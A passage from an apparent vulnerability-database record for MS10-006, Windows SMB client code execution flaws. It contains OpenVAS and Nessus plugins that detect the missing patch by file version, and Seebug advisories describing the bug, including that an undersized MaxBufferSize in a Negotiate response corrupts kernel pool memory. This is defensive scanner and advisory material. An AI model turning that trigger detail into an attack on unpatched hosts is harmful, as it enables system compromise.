"cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:*:*:x32:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp1:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:-:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:*:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:x64:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:10:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0017", "CVE-2010-0016"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-006.", "modified": "2017-04-11T00:00:00", "published": "2010-02-10T00:00:00", "id": "OPENVAS:902112", "href": "http://plugins.openvas.org/nasl.php?oid=902112", "type": "openvas", "title": "Microsoft SMB Client Remote Code Execution Vulnerabilities (978251)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-006.nasl 5934 2017-04-11 12:28:28Z antu123 $\n#\n# Microsoft SMB Client Remote Code Execution Vulnerabilities (978251)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-22\n# - To detect file version 'Mrxsmb.sys' on vista, win 2008 and win 7\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_id(902112);\n script_version(\"$Revision: 5934 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-11 14:28:28 +0200 (Tue, 11 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-10 16:06:43 +0100 (Wed, 10 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-0017\", \"CVE-2010-0016\");\n script_bugtraq_id(38100);\n script_name(\"Microsoft SMB Client Remote Code Execution Vulnerabilities (978251)\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/0339\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/ms10-006.mspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : \"Successful exploitation could allow remote attackers to crash an affected\n system or execute arbitrary code by tricking a user into visiting a specially\n crafted web page.\n Impact Level: System\");\n script_tag(name : \"affected\" , value : \"Micorsoft Windows 7\n Microsoft Windows 2000 Service Pack 4 and prior\n Microsoft Windows XP Service Pack 3 and prior\n Microsoft Windows 2003 Service Pack 2 and prior\n Microsoft Windows Vista Service Pack 1/2 and prior.\n Microsoft Windows Server 2008 Service Pack 1/2 and prior.\");\n script_tag(name : \"insight\" , value : \"The flaws are due to pool corruption error in SMB client implementation. It is\n improperly validating fields in the SMB response.\");\n script_tag(name : \"solution\" , value : \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms10-006.mspx\");\n script_tag(name : \"summary\" , value : \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-006.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3, winVista:3, win7:1, win2008:3) <= 0){\n exit(0);\n}\n\n# Check for MS10-008 Hotfix\nif(hotfix_missing(name:\"978251\") == 0){\n exit(0);\n}\n\n## Get System32 path\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n sysVer = fetch_file_version(sysPath, file_name:\"drivers\\Mrxsmb.sys\");\n if(!sysVer){\n exit(0);\n }\n}\n\n# Windows 2K\nif(hotfix_check_sp(win2k:5) > 0)\n{\n # Grep for Mrxsmb.sys version < 5.0.2195.7362\n if(version_is_less(version:sysVer, test_version:\"5.0.2195.7362\")){\n security_message(0);\n }\n}\n# Windows XP\nelse if(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Mrxsmb.sys < 5.1.2600.3652\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.3652\")){\n security_message(0);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n # Grep for Mrxsmb.sys < 5.1.2600.5911\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.5911\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Mrxsmb.sys version < 5.2.3790.4630\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4630\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Get System32 path\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n sysVer = fetch_file_version(sysPath, file_name:\"drivers\\Mrxsmb.sys\");\n if(!sysVer){\n exit(0);\n }\n}\n\n# Windows Vista\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Mrxsmb.sys version < 6.0.6001.18375\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18375\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Mrxsmb.sys version < 6.0.6002.18158\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18158\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows Server 2008\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Mrxsmb.sys version < 6.0.6001.18375\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18375\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Mrxsmb.sys version < 6.0.6002.18158\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18158\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 7\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n # Grep for Mrxsmb.sys version < 6.1.7600.16499\n if(version_is_less(version:sysVer, test_version:\"6.1.7600.16499\")){\n security_message(0);\n }\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-27T19:23:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0017", "CVE-2010-0016"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-006.", "modified": "2020-04-23T00:00:00", "published": "2010-02-10T00:00:00", "id": "OPENVAS:1361412562310902112", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902112", "type": "openvas", "title": "Microsoft SMB Client Remote Code Execution Vulnerabilities (978251)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft SMB Client Remote Code Execution Vulnerabilities (978251)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-22\n# - To detect file version 'Mrxsmb.sys' on vista, win 2008 and win 7\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902112\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-02-10 16:06:43 +0100 (Wed, 10 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-0017\", \"CVE-2010-0016\");\n script_bugtraq_id(38100);\n script_name(\"Microsoft SMB Client Remote Code Execution Vulnerabilities (978251)\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0339\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-006\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to crash an affected\n system or execute arbitrary code by tricking a user into visiting a specially\n crafted web page.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7\n\n - Microsoft Windows 2000 Service Pack 4 and prior\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2003 Service Pack 2 and prior\n\n - Microsoft Windows Vista Service Pack 1/2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 1/2 and prior\");\n script_tag(name:\"insight\", value:\"The flaws are due to pool corruption error in SMB client implementation. It is\n improperly validating fields in the SMB response.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-006.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3, winVista:3, win7:1, win2008:3) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"978251\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n sysVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\Mrxsmb.sys\");\n if(!sysVer){\n exit(0);\n }\n}\n\nif(hotfix_check_sp(win2k:5) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"5.0.2195.7362\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.0.2195.7362\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n}\nelse if(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.3652\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.1.2600.3652\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.5911\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.1.2600.5911\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4630\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.2.3790.4630\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n sysVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\Mrxsmb.sys\");\n if(!sysVer){\n exit(0);\n }\n}\n\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18375\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"6.0.6001.18375\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18158\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"6.0.6002.18158\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18375\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"6.0.6001.18375\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18158\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"6.0.6002.18158\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.7600.16499\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"6.1.7600.16499\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:43:29", "description": "The version of the SMB client software installed on the remote\nWindows host is affected by two vulnerabilities that could allow\narbitrary code execution :\n\n - Improper validation of fields in SMB responses can lead\n to a pool corruption issue and in turn to arbitrary\n code execution with SYSTEM level privileges.\n (CVE-2010-0016)\n\n - Improper handling of a race condition involving SMB\n 'Negotiate' responses may allow a remote attacker to\n execute arbitrary code, cause a denial of service, or\n escalate his privileges. (CVE-2010-0017)\n\nNote that successful exploitation of either issue requires an\nattacker to trick a user on the affected host into initiating an SMB\nconnection to a malicious SMB server.", "edition": 27, "published": "2010-02-09T00:00:00", "title": "MS10-006: Vulnerabilities in SMB Client Could Allow Remote Code Execution (978251)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0017", "CVE-2010-0016"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS10-006.NASL", "href": "https://www.tenable.com/plugins/nessus/44416", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44416);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2010-0016\", \"CVE-2010-0017\");\n script_bugtraq_id(38093, 38100);\n script_xref(name:\"MSFT\", value:\"MS10-006\");\n script_xref(name:\"MSKB\", value:\"978251\");\n\n script_name(english:\"MS10-006: Vulnerabilities in SMB Client Could Allow Remote Code Execution (978251)\");\n script_summary(english:\"Checks version of Mrxsmb.sys\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"Arbitrary code can be executed on the remote host through its SMB\nclient.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of the SMB client software installed on the remote\nWindows host is affected by two vulnerabilities that could allow\narbitrary code execution :\n\n - Improper validation of fields in SMB responses can lead\n to a pool corruption issue and in turn to arbitrary\n code execution with SYSTEM level privileges.\n (CVE-2010-0016)\n\n - Improper handling of a race condition involving SMB\n 'Negotiate' responses may allow a remote attacker to\n execute arbitrary code, cause a denial of service, or\n escalate his privileges. (CVE-2010-0017)\n\nNote that successful exploitation of either issue requires an\nattacker to trick a user on the affected host into initiating an SMB\nconnection to a malicious SMB server.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-006\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Windows 2000, XP, 2003,\nVista, 2008, 7, and 2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(20, 362);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-006';\nkbs = make_list(\"978251\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'2,3', win2003:'2', vista:'0,2', win7:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nkb = \"978251\";\n\nif (\n # Windows 7 and Windows Server 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mrxsmb.sys\", version:\"6.1.7600.20612\", min_version:\"6.1.7600.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mrxsmb.sys\", version:\"6.1.7600.16499\", min_version:\"6.1.7600.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Vista / Windows 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mrxsmb.sys\", version:\"6.0.6002.22281\", min_version:\"6.0.6002.22000\", dir:\"\\System32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mrxsmb.sys\", version:\"6.0.6002.18158\", min_version:\"6.0.6002.18000\", dir:\"\\System32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Mrxsmb.sys\", version:\"6.0.6001.22575\", min_version:\"6.0.6001.22000\", dir:\"\\System32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Mrxsmb.sys\", version:\"6.0.6001.18375\", min_version:\"6.0.6001.18000\", dir:\"\\System32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"Mrxsmb.sys\", version:\"6.0.6000.21173\", min_version:\"6.0.6000.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"Mrxsmb.sys\", version:\"6.0.6000.16971\", min_version:\"6.0.6000.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP x64\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mrxsmb.sys\", version:\"5.2.3790.4630\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"Mrxsmb.sys\", version:\"5.1.2600.5911\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, arch:\"x86\", file:\"Mrxsmb.sys\", version:\"5.1.2600.3652\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2000\n hotfix_is_vulnerable(os:\"5.0\", file:\"Mrxsmb.sys\", version:\"5.0.2195.7362\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:14:06", "description": "BUGTRAQ ID: 38093\r\nCVE ID: CVE-2010-0016\r\n\r\nMicrosoft Windows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nSMB\u5ba2\u6237\u7aef\u5b9e\u73b0\u6ca1\u6709\u6b63\u786e\u7684\u9a8c\u8bc1SMB\u54cd\u5e94\u4e2d\u7684\u5b57\u6bb5\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5411\u521d\u59cbSMB\u8bf7\u6c42\u7684\u5ba2\u6237\u7aef\u56de\u590d\u7279\u5236\u7684SMB\u54cd\u5e94\u6765\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\r\n\r\n\u5728\u521d\u59cb\u5316SMB\u901a\u8baf\u65f6\u5ba2\u6237\u7aef\u4f1a\u53d1\u9001Negotiate Protocol\u62a5\u6587\u6765\u534f\u5546\u5bf9\u8bdd\uff0c\u670d\u52a1\u5668\u7684\u54cd\u5e94\u5305\u542b\u6709\u4ee5\u4e0b\u7ed3\u6784\uff1a\r\n\r\nuchar WordCount; /* must be 0x11 (17) */\r\nushort DialectIndex; /* selected dialect */\r\nuchar SecurityMode; /* security flags */\r\nushort MaxMpxCount; /* maximum pending multiplexed requests supported */\r\nushort MaxNumberVCs; /* maximum virtual connections */\r\nulong MaxBufferSize; /* maximum SMB message size */\r\nulong MaxRawSize; /* maximum raw buffer size */\r\nulong SessionKey; /* unique session identifier */\r\nulong Capabilities; /* server capabilities */\r\nulong SystemTimeLow; /* server time - low bytes */\r\nulong SystemTimeHigh; /* server time - high bytes */\r\nshort ServerTimeZone; /* time zone */\r\nuchar EncryptionKeyLength; /* set to 0 or 8 */\r\n\r\n\u5982\u679c\u670d\u52a1\u7aef\u8fd4\u56de\u4e86\u5305\u542b\u6709\u5f88\u5c0fMaxBufferSize\u503c\u7684\u54cd\u5e94\u62a5\u6587\uff0c\u5c31\u53ef\u4ee5\u89e6\u53d1\u5185\u6838\u6c60\u7834\u574f\u3002\n\nMicrosoft Windows XP SP3\r\nMicrosoft Windows XP SP2\r\nMicrosoft Windows Server 2003 SP2\r\nMicrosoft Windows 2000SP4\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5728\u9632\u706b\u5899\u963b\u65adTCP 139\u548c445\u7aef\u53e3\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-006\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-006\uff1aVulnerabilities in SMB Client Could Allow Remote Code Execution (978251)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/Bulletin/MS10-006.mspx?pf=true", "published": "2010-02-20T00:00:00", "title": "Microsoft Windows SMB\u5ba2\u6237\u7aef\u6c60\u7834\u574f\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08MS10-006\uff09", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0016"], "modified": "2010-02-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19148", "id": "SSV:19148", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:14:13", "description": "BUGTRAQ ID: 38100\r\nCVE ID: CVE-2010-0017\r\n\r\nMicrosoft Windows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nSMB\u5ba2\u6237\u7aef\u5b9e\u73b0\u6ca1\u6709\u6b63\u786e\u7684\u9a8c\u8bc1SMB Negotiate\u54cd\u5e94\u62a5\u6587\u4e2d\u7684\u5b57\u6bb5\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5411\u521d\u59cbSMB\u8bf7\u6c42\u7684\u5ba2\u6237\u7aef\u56de\u590d\u7279\u5236\u7684SMB\u54cd\u5e94\u89e6\u53d1\u7ade\u4e89\u6761\u4ef6\uff0c\u5bfc\u81f4\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\r\n\r\n\u8fd9\u4e2a\u6f0f\u6d1e\u5728Windows Vista\u548cWindows Server 2008\u5e73\u53f0\u4e0a\u53ea\u80fd\u5bfc\u81f4\u5d29\u6e83\u6216\u6743\u9650\u63d0\u5347\u3002\n\nMicrosoft Windows Vista SP2\r\nMicrosoft Windows Vista SP1\r\nMicrosoft Windows Vista\r\nMicrosoft Windows Server 2008 SP2\r\nMicrosoft Windows Server 2008 R2\r\nMicrosoft Windows Server 2008\r\nMicrosoft Windows 7\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5728\u9632\u706b\u5899\u963b\u65adTCP 139\u548c445\u7aef\u53e3\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-006\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-006\uff1aVulnerabilities in SMB Client Could Allow Remote Code Execution (978251)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/Bulletin/MS10-006.mspx?pf=true", "published": "2010-02-20T00:00:00", "title": "Microsoft Windows 